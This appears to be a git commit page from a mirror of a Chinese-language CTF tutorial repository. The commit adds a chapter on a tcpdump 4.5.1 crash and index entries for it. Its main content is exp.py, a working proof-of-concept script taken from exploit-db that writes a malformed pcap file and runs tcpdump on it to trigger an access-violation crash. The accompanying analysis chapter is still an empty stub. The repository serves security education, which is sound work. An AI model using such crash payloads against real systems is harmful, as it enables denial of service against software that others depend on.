mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-25 11:41:16 +07:00
add 7.1.1
This commit is contained in:
parent
bd0c663d8b
commit
1c42f754e2
@ -52,6 +52,7 @@
|
||||
- 如果你新添加一个章节,需要在 **README.md**、**SUMMARY.md** 和章节所属部分相应的文件中添加条目。
|
||||
- 新增第六章题解篇,收集各种好题的Writeup,应力求详细,且能提供程序供实际操作,一个md只写一题,所有文件上传到文件夹`src/writeup`,题目最好来自 [CTFs](https://github.com/ctfs)。
|
||||
- 新增第七章实战篇,CTF之后,总是要回到现实中,对真实存在的漏洞进行分析利用,还是一样力求详细,并提供程序复现,一个md写一个漏洞,所有文件上传到`src/exploit`(程序太大的可附上网盘链接),参考 [exploit-db](https://www.exploit-db.com/)。
|
||||
- 考虑到真实漏洞的环境可能会很复杂,如果能做一个基于 docker 的环境,应该会很不错,这条就作为一个未来的计划。
|
||||
|
||||
|
||||
| 章节 | 作者 | 进度 |
|
||||
|
@ -89,6 +89,8 @@
|
||||
- [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
|
||||
|
||||
- [七、实战篇](doc/7_exploit.md)
|
||||
- Denial of Service and PoC Exploits
|
||||
- [7.1.1 tcpdump 4.5.1 Access Violation Crash](doc/7.1.1_dos_tcpdump_crash.md)
|
||||
|
||||
- [八、附录](doc/8_appendix.md)
|
||||
- [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
|
||||
|
@ -87,6 +87,8 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md)
|
||||
* [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
|
||||
* [七、实战篇](doc/7_exploit.md)
|
||||
* Denial of Service and PoC Exploits
|
||||
* [7.1.1 tcpdump 4.5.1 Access Violation Crash](doc/7.1.1_dos_tcpdump_crash.md)
|
||||
* [八、附录](doc/8_appendix.md)
|
||||
* [8.1 更多 Linux 工具](doc/8.1_Linuxtools.md)
|
||||
* [8.2 更多 Windows 工具](doc/8.2_wintools.md)
|
||||
|
@ -43,7 +43,7 @@ $ sudo python setup.py install
|
||||
|
||||
|
||||
## 使用 angr
|
||||
#### 基础功能
|
||||
#### 入门
|
||||
使用 angr 的第一步是新建一个工程,几乎所有的操作都是围绕这个工程展开的:
|
||||
```python
|
||||
>>> import angr
|
||||
|
15
doc/7.1.1_dos_tcpdump_crash.md
Normal file
15
doc/7.1.1_dos_tcpdump_crash.md
Normal file
@ -0,0 +1,15 @@
|
||||
# 7.1.1 tcpdump 4.5.1 Access Violation Crash
|
||||
|
||||
- [漏洞复现](#漏洞复现)
|
||||
- [漏洞分析](#漏洞分析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/exploit/7.1.1_dos_tcpdump_crash)
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
## 漏洞分析
|
||||
|
||||
## 参考资料
|
||||
- [TCPDump 4.5.1 - Crash (PoC)](https://www.exploit-db.com/exploits/39875/)
|
@ -1 +1,4 @@
|
||||
# 第七篇 实战篇
|
||||
|
||||
- Denial of Service and PoC Exploits
|
||||
- [7.1.1 tcpdump 4.5.1 Access Violation Crash](7.1.1_dos_tcpdump_crash.md)
|
||||
|
41
src/exploit/7.1.1_dos_tcpdump_crash/exp.py
Normal file
41
src/exploit/7.1.1_dos_tcpdump_crash/exp.py
Normal file
@ -0,0 +1,41 @@
|
||||
# Exploit Title: tcpdump 4.5.1 Access Violation Crash
|
||||
# Date: 31st May 2016
|
||||
# Exploit Author: David Silveiro
|
||||
# Vendor Homepage: http://www.tcpdump.org
|
||||
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
|
||||
# Version: 4.5.1
|
||||
# Tested on: Ubuntu 14 LTS
|
||||
|
||||
from subprocess import call
|
||||
from shlex import split
|
||||
from time import sleep
|
||||
|
||||
def crash():
|
||||
command = 'tcpdump -r crash'
|
||||
|
||||
buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
|
||||
buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
|
||||
buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
|
||||
buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
|
||||
buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
|
||||
buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
|
||||
buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'
|
||||
|
||||
with open('crash', 'w+b') as file:
|
||||
file.write(buffer)
|
||||
|
||||
try:
|
||||
call(split(command))
|
||||
print("Exploit successful! ")
|
||||
except:
|
||||
print("Error: Something has gone wrong!")
|
||||
|
||||
def main():
|
||||
print("Author: David Silveiro ")
|
||||
print(" tcpdump version 4.5.1 Access Violation Crash ")
|
||||
|
||||
sleep(2)
|
||||
crash()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
Loading…
Reference in New Issue
Block a user